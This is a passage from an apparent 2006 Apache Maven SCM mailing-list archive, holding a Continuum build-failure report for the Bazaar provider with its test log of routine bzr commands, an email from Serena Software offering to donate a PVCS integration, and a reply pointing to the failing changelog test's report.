/maven/scm/trunk/maven-scm-providers/maven-scm-provider-clearcase/src/test/java/org/apache/maven/scm/provider/clearcase/command/checkout/ClearCaseCheckOutCommandTest.java > /maven/scm/trunk/maven-scm-providers/maven-scm-provider-starteam/src/main/java/org/apache/maven/scm/provider/starteam/command/changelog/StarteamChangeLogConsumer.java > /maven/scm/trunk/maven-scm-providers/maven-scm-provider-starteam/src/test/java/org/apache/maven/scm/provider/starteam/command/changelog/StarteamChangeLogConsumerTest.java > /maven/scm/trunk/maven-scm-providers/maven-scm-providers-cvs/maven-scm-provider-cvs-commons/src/main/java/org/apache/maven/scm/provider/cvslib/AbstractCvsScmProvider.java > /maven/scm/trunk/maven-scm-providers/maven-scm-providers-cvs/maven-scm-provider-cvs-commons/src/main/java/org/apache/maven/scm/provider/cvslib/repository/CvsScmProviderRepository.java > /maven/scm/trunk/maven-scm-providers/maven-scm-providers-cvs/maven-scm-provider-cvs-commons/src/test/java/org/apache/maven/scm/provider/cvslib/repository/CvsScmProviderRepositoryTest.java > /maven/scm/trunk/maven-scm-providers/maven-scm-providers-svn/maven-scm-provider-svnexe/src/test/java/org/apache/maven/scm/provider/svn/svnexe/command/SvnCommandLineUtilsTest.java > > **************************************************************************** > Output: > **************************************************************************** > [INFO] Scanning for projects... > [INFO] ---------------------------------------------------------------------------- > [INFO] Building Maven SCM Bazaar Provider > [INFO] task-segment: [clean, install] > [INFO] ---------------------------------------------------------------------------- > [INFO] [clean:clean] > [INFO] Deleting directory /home/continuum/continuum-maven/working-directory/80/target > [INFO] Deleting directory /home/continuum/continuum-maven/working-directory/80/target/classes > [INFO] Deleting directory /home/continuum/continuum-maven/working-directory/80/target/test-classes > [INFO] [resources:resources] > [INFO] Using default encoding to copy filtered resources. > [INFO] [compiler:compile] > Compiling 20 source files to /home/continuum/continuum-maven/working-directory/80/target/classes > [INFO] [resources:testResources] > [INFO] Using default encoding to copy filtered resources. > [INFO] [compiler:testCompile] > Compiling 8 source files to /home/continuum/continuum-maven/working-directory/80/target/test-classes > [INFO] [surefire:test] > [INFO] Setting reports dir: /home/continuum/continuum-maven/working-directory/80/target/surefire-reports > > ------------------------------------------------------- > T E S T S > ------------------------------------------------------- > [surefire] Running org.apache.maven.scm.provider.bazaar.command.checkin.BazaarCheckInCommandTest > EXECUTING: bzr init > EXECUTING: bzr add /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom.xml /home/continuum/continuum-maven/working-directory/80/target/test-branch/readme.txt /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/main/java/Application.java /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/test/java/Test.java > EXECUTING: bzr commit --message "Add files to test branch" > [INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy > [INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy > [INFO] EXECUTING: bzr inventory > [INFO] EXECUTING: bzr add --no-recurse src/main/java/Foo.java > [INFO] [src/main/java/Foo.java:added] > [INFO] EXECUTING: bzr status > [INFO] [src/main/java/Foo.java:added] > [INFO] [readme.txt:modified] > [INFO] [src/main/java/Bar.java:unknown] > [INFO] EXECUTING: bzr commit --message "Commit message" > [INFO] EXECUTING: bzr push /home/continuum/continuum-maven/working-directory/80/target/test-branch > [INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/assertion-copy > [INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/assertion-copy > [INFO] EXECUTING: bzr inventory > EXECUTING: bzr init > EXECUTING: bzr add /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom.xml /home/continuum/continuum-maven/working-directory/80/target/test-branch/readme.txt /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/main/java/Application.java /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/test/java/Test.java > EXECUTING: bzr commit --message "Add files to test branch" > [INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy > [INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy > [INFO] EXECUTING: bzr inventory > [INFO] EXECUTING: bzr add --no-recurse src/main/java/Foo.java > [INFO] [src/main/java/Foo.java:added] > [INFO] EXECUTING: bzr commit --message "Commit message" src/main/java/Foo.java > [INFO] EXECUTING: bzr push /home/continuum/continuum-maven/working-directory/80/target/test-branch > [INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/assertion-copy > [INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/assertion-copy > [INFO] EXECUTING: bzr inventory > [surefire] Tests run: 2, Failures: 0, Errors: 0, Time elapsed: 8.089 sec > [surefire] Running org.apache.maven.scm.provider.bazaar.command.checkout.BazaarCheckOutCommandTest > EXECUTING: bzr init > EXECUTING: bzr add /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom.xml /home/continuum/continuum-maven/working-directory/80/target/test-branch/readme.txt /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/main/java/Application.java /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/test/java/Test.java > EXECUTING: bzr commit --message "Add files to test branch" > [INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy > [INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy > [INFO] EXECUTING: bzr inventory > [INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy > [INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy > [INFO] EXECUTING: bzr inventory > [surefire] Tests run: 1, Failures: 0, Errors: 0, Time elapsed: 1.289 sec > [surefire] Running org.apache.maven.scm.provider.bazaar.command.status.BazaarStatusCommandTest > EXECUTING: bzr init > EXECUTING: bzr add /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom.xml /home/continuum/continuum-maven/working-directory/80/target/test-branch/readme.txt /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/main/java/Application.java /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/test/java/Test.java > EXECUTING: bzr commit --message "Add files to test branch" > [INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy > [INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy > [INFO] EXECUTING: bzr inventory > [INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/updating-copy > [INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/updating-copy > [INFO] EXECUTING: bzr inventory > [INFO] EXECUTING: bzr add --no-recurse project.xml > [INFO] [project.xml:added] > [INFO] EXECUTING: bzr status > [INFO] [project.xml:added] > [INFO] [readme.txt:modified] > [INFO] EXECUTING: bzr commit --message "No msg" > [INFO] EXECUTING: bzr push /home/continuum/continuum-maven/working-directory/80/target/test-branch > [INFO] EXECUTING: bzr add --no-recurse src/test/java/org > [INFO] [src/test/java/org:added] > [INFO] EXECUTING: bzr add --no-recurse src/main/java/org > [INFO] [src/main/java/org:added] > [INFO] EXECUTING: bzr add --no-recurse src/main/java/org/Foo.java > [INFO] [src/main/java/org/Foo.java:added] > [INFO] EXECUTING: bzr status > [INFO] New directory added: /home/continuum/continuum-maven/working-directory/80/target/scm-test/updating-copy/src/main/java/org > [INFO] [src/main/java/org/Foo.java:added] > [INFO] New directory added: /home/continuum/continuum-maven/working-directory/80/target/scm-test/updating-copy/src/test/java/org > [INFO] [pom.xml:modified] > [surefire] Tests run: 1, Failures: 0, Errors: 0, Time elapsed: 2.921 sec > [surefire] Running org.apache.maven.scm.provider.bazaar.command.diff.BazaarDiffCommandTest > EXECUTING: bzr init > EXECUTING: bzr add /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom.xml /home/continuum/continuum-maven/working-directory/80/target/test-branch/readme.txt /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/main/java/Application.java /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/test/java/Test.java > EXECUTING: bzr commit --message "Add files to test branch" > [INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy > [INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy > [INFO] EXECUTING: bzr inventory > [INFO] EXECUTING: bzr add --no-recurse project.xml > [INFO] [project.xml:added] > [INFO] EXECUTING: bzr add --no-recurse src/test/java/org > [INFO] [src/test/java/org:added] > [INFO] EXECUTING: bzr add --no-recurse src/main/java/org > [INFO] [src/main/java/org:added] > [INFO] EXECUTING: bzr add --no-recurse src/main/java/org/Foo.java > [INFO] [src/main/java/org/Foo.java:added] > [INFO] EXECUTING: bzr diff > [surefire] Tests run: 1, Failures: 0, Errors: 0, Time elapsed: 1.761 sec > [surefire] Running org.apache.maven.scm.provider.bazaar.command.update.BazaarUpdateCommandTest > EXECUTING: bzr init > EXECUTING: bzr add /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom.xml /home/continuum/continuum-maven/working-directory/80/target/test-branch/readme.txt /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/main/java/Application.java /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/test/java/Test.java > EXECUTING: bzr commit --message "Add files to test branch" > [INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy > [INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy > [INFO] EXECUTING: bzr inventory > [INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/updating-copy > [INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/updating-copy > [INFO] EXECUTING: bzr inventory > [INFO] EXECUTING: bzr add --no-recurse project.xml > [INFO] [project.xml:added] > [INFO] EXECUTING: bzr add --no-recurse src/test/java/org > [INFO] [src/test/java/org:added] > [INFO] EXECUTING: bzr add --no-recurse src/main/java/org > [INFO] [src/main/java/org:added] > [INFO] EXECUTING: bzr add --no-recurse src/main/java/org/Foo.java > [INFO] [src/main/java/org/Foo.java:added] > [INFO] EXECUTING: bzr status > [INFO] [project.xml:added] > [INFO] New directory added: /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy/src/main/java/org > [INFO] [src/main/java/org/Foo.java:added] > [INFO] New directory added: /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy/src/test/java/org > [INFO] [readme.txt:modified] > [INFO] EXECUTING: bzr commit --message "No msg" > [INFO] EXECUTING: bzr push /home/continuum/continuum-maven/working-directory/80/target/test-branch > [INFO] EXECUTING: bzr pull > [INFO] EXECUTING: bzr revno > [INFO] EXECUTING: bzr diff --revision 1 > [INFO] EXECUTING: bzr log --verbose > <changelog-entry> > <date pattern="yyyy-MM-dd">2006-03-28</date> > <time pattern="HH:mm:ss">05:05:38</time> > <author><![CDATA[continuum <[email protected]>]]></author> > <file> > <name>project.xml</name> > <revision>2</revision> > </file> > <file> > <name>src/main/java/org/</name> > <revision>2</revision> > </file> > <file> > <name>src/main/java/org/Foo.java</name> > <revision>2</revision> > </file> > <file> > <name>src/test/java/org/</name> > <revision>2</revision> > </file> > <file> > <name>readme.txt</name> > <revision>2</revision> > </file> > <msg><![CDATA[No msg]]></msg> > </changelog-entry> > > [surefire] Tests run: 1, Failures: 0, Errors: 0, Time elapsed: 4.862 sec > [surefire] Running org.apache.maven.scm.provider.bazaar.command.changelog.BazaarChangeLogCommandTckTest > EXECUTING: bzr init > EXECUTING: bzr add /home/continuum/continuum-maven/working-directory/80/target/test-branch/pom.xml /home/continuum/continuum-maven/working-directory/80/target/test-branch/readme.txt /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/main/java/Application.java /home/continuum/continuum-maven/working-directory/80/target/test-branch/src/test/java/Test.java > EXECUTING: bzr commit --message "Add files to test branch" > [INFO] Removing /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy > [INFO] EXECUTING: bzr branch /home/continuum/continuum-maven/working-directory/80/target/test-branch /home/continuum/continuum-maven/working-directory/80/target/scm-test/working-copy > [INFO] EXECUTING: bzr inventory > [INFO] EXECUTING: bzr log --verbose > [INFO] EXECUTING: bzr status > [INFO] [readme.txt:modified] > [INFO] EXECUTING: bzr commit --message "Second changelog" > [INFO] EXECUTING: bzr push /home/continuum/continuum-maven/working-directory/80/target/test-branch > [INFO] EXECUTING: bzr log --verbose > [INFO] EXECUTING: bzr log --verbose > [surefire] Tests run: 1, Failures: 1, Errors: 0, Time elapsed: 3.115 sec <<<<<<<< FAILURE !! > [surefire] Running org.apache.maven.scm.provider.bazaar.command.changelog.BazaarChangeLogConsumerTest > [surefire] Tests run: 1, Failures: 0, Errors: 0, Time elapsed: 0.031 sec > [INFO] ---------------------------------------------------------------------------- > [ERROR] BUILD ERROR > [INFO] ---------------------------------------------------------------------------- > [INFO] There are test failures. > [INFO] ---------------------------------------------------------------------------- > [INFO] For more information, run Maven with the -e switch > [INFO] ---------------------------------------------------------------------------- > [INFO] Total time: 28 seconds > [INFO] Finished at: Tue Mar 28 05:05:42 PST 2006 > [INFO] Final Memory: 7M/159M > [INFO] ---------------------------------------------------------------------------- > > **************************************************************************** > > From [email protected] Tue Mar 28 18:43:45 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 6794 invoked from network); 28 Mar 2006 18:43:44 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Mar 2006 18:43:43 -0000 Received: (qmail 69439 invoked by uid 500); 28 Mar 2006 18:43:34 -0000 Delivered-To: [email protected] Received: (qmail 69387 invoked by uid 500); 28 Mar 2006 18:43:34 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 67153 invoked by uid 99); 28 Mar 2006 18:40:22 -0000 X-ASF-Spam-Status: No, hits=0.3 required=10.0 tests=HTML_FONT_BIG,HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C65297.0681802E" Subject: PVCS and Maven Date: Tue, 28 Mar 2006 10:40:10 -0800 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: PVCS and Maven Thread-Index: AcZSlwrKACLbcw7XQZq+EgTetb3/9Q== From: "Kevin Parker" <[email protected]> To: <[email protected]> Cc: "David Parker" <[email protected]>, "Francis Long" <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N This is a multi-part message in MIME format. ------_=_NextPart_001_01C65297.0681802E Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: quoted-printable Dear Maven's, We have recently developed a Maven interface for our PVCS product and are interested in the process for potentially donating this to the project. Could someone contact me and let me know what the process would be. Sincerely, Kevin Kevin Parker Vice President Market Development Serena Software Inc.=20 2755 Campus Drive, 3rd Floor, San Mateo, CA 94403-2538 www.serena.com=20 tel 480-986-8231 fax 480-986-8231 cell 480-986-8231 email [email protected] ********************************************************************** This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. Any unauthorized review, use, disclosure or distribution is = prohibited. If you are not the intended recipient, please contact the sende= r by reply e-mail and destroy all copies of the original message. ------_=_NextPart_001_01C65297.0681802E Content-Type: text/html; charset="US-ASCII" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> <HTML> <HEAD> <META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; charset=3Dus-ascii"> <META NAME=3D"Generator" CONTENT=3D"MS Exchange Server version 6.5.7638.1"> <TITLE>PVCS and Maven</TITLE> </HEAD> <BODY> <!-- Converted from text/rtf format --> <P ALIGN=3DLEFT><SPAN LANG=3D"en-us"><FONT SIZE=3D2 FACE=3D"Arial">Dear Mav= en</FONT></SPAN><SPAN LANG=3D"en-us"><FONT SIZE=3D2 FACE=3D"Arial">&#8217;<= /FONT></SPAN><SPAN LANG=3D"en-us"><FONT SIZE=3D2 FACE=3D"Arial">s,</FONT></= SPAN></P> <P ALIGN=3DLEFT><SPAN LANG=3D"en-us"><FONT SIZE=3D2 FACE=3D"Arial">We have = recently developed a Maven interface for our PVCS product and are intereste= d in the process for potentially</FONT></SPAN><SPAN LANG=3D"en-us"> <FONT S= IZE=3D2 FACE=3D"Arial">donating</FONT></SPAN><SPAN LANG=3D"en-us"><FONT SIZ= E=3D2 FACE=3D"Arial"></FONT></SPAN><SPAN LANG=3D"en-us"> <FONT SIZE=3D2 FAC= E=3D"Arial">this to the project. Could someone contact me and let me know w= hat the process would be.</FONT></SPAN><SPAN LANG=3D"en-us"></SPAN></P> <P ALIGN=3DLEFT><SPAN LANG=3D"en-us"></SPAN><A NAME=3D""><SPAN LANG=3D"en-u= s"><FONT COLOR=3D"#000080" SIZE=3D2 FACE=3D"Arial">Sincerely,<BR> <BR> </FONT></SPAN></A><SPAN LANG=3D"en-us"><B><I></I></B></SPAN><SPAN LANG=3D"e= n-us"><B><I></I></B></SPAN><SPAN LANG=3D"en-us"><B><I></I></B></SPAN><B><I>= <SPAN LANG=3D"en-us"><FONT COLOR=3D"#0000FF" SIZE=3D4 FACE=3D"Lucida Handwr= iting">Kevin<BR> </FONT></SPAN></I></B><SPAN LANG=3D"en-us"><B><I></I></B></SPAN><SPAN LANG= =3D"en-us"><B><I></I></B></SPAN><B><I><SPAN LANG=3D"en-us"><BR> </SPAN></I></B><SPAN LANG=3D"en-us"><B></B></SPAN><B><SPAN LANG=3D"en-us"><= FONT COLOR=3D"#000080" SIZE=3D2 FACE=3D"Arial">Kevin Parker</FONT></SPAN></= B><SPAN LANG=3D"en-us"><B></B></SPAN><B><SPAN LANG=3D"en-us"><BR> </SPAN></B><SPAN LANG=3D"en-us"><I></I></SPAN><I><SPAN LANG=3D"en-us"><FONT= COLOR=3D"#000080" SIZE=3D2 FACE=3D"Arial">Vice President</FONT></SPAN></I>= <SPAN LANG=3D"en-us"><I></I></SPAN><I><SPAN LANG=3D"en-us"><FONT COLOR=3D"#= 000080" SIZE=3D2 FACE=3D"Arial"></FONT></SPAN></I><SPAN LANG=3D"en-us"><I><= /I></SPAN><I><SPAN LANG=3D"en-us"> <FONT COLOR=3D"#000080" SIZE=3D2 FACE=3D= "Arial">Market Development</FONT></SPAN></I><SPAN LANG=3D"en-us"><I></I></S= PAN><I><SPAN LANG=3D"en-us"><BR> </SPAN></I><SPAN LANG=3D"en-us"><B></B></SPAN><B><SPAN LANG=3D"en-us"><FONT= COLOR=3D"#000080" SIZE=3D2 FACE=3D"Arial">Serena Software Inc</FONT></SPAN= ></B><SPAN LANG=3D"en-us"></SPAN><SPAN LANG=3D"en-us"><FONT COLOR=3D"#00008= 0" SIZE=3D2 FACE=3D"Arial">.</FONT></SPAN><SPAN LANG=3D"en-us"></SPAN><SPAN= LANG=3D"en-us"><BR> </SPAN><SPAN LANG=3D"en-us"></SPAN><SPAN LANG=3D"en-us"><FONT COLOR=3D"#000= 080" SIZE=3D2 FACE=3D"Arial">2755 Campus Drive, 3</FONT></SPAN><SPAN LANG= =3D"en-us"></SPAN><SPAN LANG=3D"en-us"><SUP><FONT COLOR=3D"#000080" SIZE=3D= 2 FACE=3D"Arial">rd</FONT></SUP></SPAN><SPAN LANG=3D"en-us"></SPAN><SPAN LA= NG=3D"en-us"><FONT COLOR=3D"#000080" SIZE=3D2 FACE=3D"Arial"> Floor</FONT><= /SPAN><SPAN LANG=3D"en-us"></SPAN><SPAN LANG=3D"en-us"><FONT COLOR=3D"#0000= 80" SIZE=3D2 FACE=3D"Arial">,</FONT></SPAN><SPAN LANG=3D"en-us"></SPAN><SPA= N LANG=3D"en-us"> <FONT COLOR=3D"#000080" SIZE=3D2 FACE=3D"Arial">San Mateo= , CA 94403-2538</FONT></SPAN><SPAN LANG=3D"en-us"></SPAN><SPAN LANG=3D"en-u= s"><BR> </SPAN><SPAN LANG=3D"en-us"><B></B></SPAN><B><SPAN LANG=3D"en-us"><FONT COL= OR=3D"#000080" SIZE=3D2 FACE=3D"Arial">www.serena.com</FONT></SPAN></B><SPA= N LANG=3D"en-us"><B></B></SPAN><B><SPAN LANG=3D"en-us"><BR> </SPAN></B><SPAN LANG=3D"en-us"></SPAN><SPAN LANG=3D"en-us"><FONT COLOR=3D"= #000080" SIZE=3D2 FACE=3D"Arial">tel&nbsp;&nbsp;&nbsp;&nbsp; 480-986-8231</= FONT></SPAN><SPAN LANG=3D"en-us"></SPAN><SPAN LANG=3D"en-us"><BR> </SPAN><SPAN LANG=3D"en-us"></SPAN><SPAN LANG=3D"en-us"><FONT COLOR=3D"#000= 080" SIZE=3D2 FACE=3D"Arial">fax&nbsp;&nbsp;&nbsp;&nbsp; 480-986-8231</FONT= ></SPAN><SPAN LANG=3D"en-us"></SPAN><SPAN LANG=3D"en-us"><BR> </SPAN><SPAN LANG=3D"en-us"></SPAN><SPAN LANG=3D"en-us"><FONT COLOR=3D"#000= 080" SIZE=3D2 FACE=3D"Arial">cell&nbsp;&nbsp;&nbsp; 480-986-8231</FONT></SP= AN><SPAN LANG=3D"en-us"></SPAN><SPAN LANG=3D"en-us"><BR> </SPAN><SPAN LANG=3D"en-us"></SPAN><SPAN LANG=3D"en-us"><FONT COLOR=3D"#000= 080" SIZE=3D2 FACE=3D"Arial">email&nbsp;&nbsp;</FONT></SPAN><SPAN LANG=3D"e= n-us"></SPAN><SPAN LANG=3D"en-us"> <FONT COLOR=3D"#000080" SIZE=3D2 FACE=3D= "Arial">[email protected]</FONT></SPAN><SPAN LANG=3D"en-us"></SPAN><SPAN L= ANG=3D"en-us"></SPAN></P> <P ALIGN=3DLEFT><SPAN LANG=3D"en-us"></SPAN><SPAN LANG=3D"en-us"></SPAN><SP= AN LANG=3D"en-us"></SPAN><SPAN LANG=3D"en-us"></SPAN></P> <P ALIGN=3DLEFT><SPAN LANG=3D"en-us"></SPAN></P> <FONT SIZE=3D3><BR> <BR> **********************************************************************<BR> This email and any files transmitted with it are confidential and<BR> intended solely for the use of the individual or entity to whom they<BR> are addressed. Any unauthorized review, use, disclosure or distribution is = prohibited. If you are not the intended recipient, please contact the sende= r by reply e-mail and destroy all copies of the original message.<BR> </FONT> </BODY> </HTML> ------_=_NextPart_001_01C65297.0681802E-- From [email protected] Tue Mar 28 19:17:53 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 28642 invoked from network); 28 Mar 2006 19:17:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Mar 2006 19:17:53 -0000 Received: (qmail 54280 invoked by uid 500); 28 Mar 2006 19:17:52 -0000 Delivered-To: [email protected] Received: (qmail 54266 invoked by uid 500); 28 Mar 2006 19:17:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <scm-dev.maven.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 54255 invoked by uid 99); 28 Mar 2006 19:17:52 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 28 Mar 2006 11:17:52 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO webmail9.amenworld.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 28 Mar 2006 11:17:50 -0800 Received: (qmail 11884 invoked from network); 28 Mar 2006 19:17:28 -0000 Received: from 90.20.99-84.rev.gaoland.net (HELO ?161.129.204.104?) (161.129.204.104) by 0 with SMTP; 28 Mar 2006 19:17:28 -0000 Message-ID: <[email protected]> Date: Tue, 28 Mar 2006 21:17:23 +0200 From: Emmanuel Venisse <[email protected]> User-Agent: Mozilla Thunderbird 1.0.6 (Windows/20050716) X-Accept-Language: fr, en MIME-Version: 1.0 To: [email protected] Subject: Re: [continuum] BUILD FAILURE: Maven SCM Bazaar Provider References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N The error is here : http://ci.codehaus.org:8002/continuum/servlet/browse?file=80/target/surefire-reports/org.apache.maven.scm.provider.bazaar.command.changelog.BazaarChangeLogCommandTckTest.txt Emmanuel Brett Porter a écrit : > bzr seems to be correctly installed now. Anyone have any ideas on this one? > > - Brett > > Continuum Build Server wrote: > >>Online report : http://ci.codehaus.org/continuum-maven/servlet/continuum/target/ProjectBuild.vm/view/ProjectBuild/id/80/buildId/490 >>Build statistics: >> State: Failed >> Previous State: Failed >> Started at: Tue, 28 Mar 2006 05:05:12 -0800 >> Finished at: Tue, 28 Mar 2006 05:05:42 -0800 >> Total time: 29s >> Build Trigger: Schedule >> Exit code: 1 >> Building machine hostname: cheddar.simulalabs.com >> Operating system : Linux(unknown) >> Java version : 1.5.0_03(Sun Microsystems Inc.) >> >>Changes >> evenisse Formatting >> /maven/scm/trunk/maven-scm-api/src/main/java/org/apache/maven/scm/command/add/AddScmResult.java >> /maven/scm/trunk/maven-scm-plugin/src/main/java/org/apache/maven/scm/plugin/AbstractScmMojo.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/main/java/org/apache/maven/scm/provider/bazaar/BazaarConfig.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/main/java/org/apache/maven/scm/provider/bazaar/BazaarUtils.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/main/java/org/apache/maven/scm/provider/bazaar/command/changelog/BazaarChangeLogCommand.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/main/java/org/apache/maven/scm/provider/bazaar/command/changelog/BazaarChangeLogConsumer.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/main/java/org/apache/maven/scm/provider/bazaar/command/diff/BazaarDiffConsumer.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/test/java/org/apache/maven/scm/provider/bazaar/BazaarTestUtils.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-provider-bazaar/src/test/java/org/apache/maven/scm/provider/bazaar/command/changelog/BazaarChangeLogConsumerTest.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-provider-clearcase/src/test/java/org/apache/maven/scm/provider/clearcase/command/checkout/ClearCaseCheckOutCommandTest.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-provider-starteam/src/main/java/org/apache/maven/scm/provider/starteam/command/changelog/StarteamChangeLogConsumer.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-provider-starteam/src/test/java/org/apache/maven/scm/provider/starteam/command/changelog/StarteamChangeLogConsumerTest.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-providers-cvs/maven-scm-provider-cvs-commons/src/main/java/org/apache/maven/scm/provider/cvslib/AbstractCvsScmProvider.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-providers-cvs/maven-scm-provider-cvs-commons/src/main/java/org/apache/maven/scm/provider/cvslib/repository/CvsScmProviderRepository.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-providers-cvs/maven-scm-provider-cvs-commons/src/test/java/org/apache/maven/scm/provider/cvslib/repository/CvsScmProviderRepositoryTest.java >> /maven/scm/trunk/maven-scm-providers/maven-scm-providers-svn/maven-scm-provider-svnexe/src/test/java/org/apache/maven/scm/provider/svn/svnexe/command/SvnCommandLineUtilsTest.java >> >>**************************************************************************** >>Output: >>**************************************************************************** >>[INFO] Scanning for projects... >>[INFO] ---------------------------------------------------------------------------- >>[INFO] Building Maven SCM Bazaar Provider >>[INFO] task-segment: [clean, install] >>[INFO] ---------------------------------------------------------------------------- >>[INFO] [clean:clean] >>[INFO] Deleting directory /home/continuum/continuum-maven/working-directory/80/target >>[INFO] Deleting directory /home/continuum/continuum-maven/working-directory/80/target/classes >>[INFO] Deleting directory /home/continuum/continuum-maven/working-directory/80/target/test-classes >>[INFO] [resources:resources] >>[INFO] Using default encoding to copy filtered resources. >>[INFO] [compiler:compile] >>Compiling 20 source files to /home/continuum/continuum-maven/working-directory/80/target/classes >>[INFO] [resources:testResources] >>[INFO] Using default encoding to copy filtered resources. >>[INFO] [compiler:testCompile] >>Compiling 8 source files to /home/continuum/continuum-maven/working-directory/80/target/test-classes >>[INFO] [surefire:test] >>[INFO] Setting reports dir: /home/continuum/continuum-maven/working-directory/80/target/surefire-reports >> 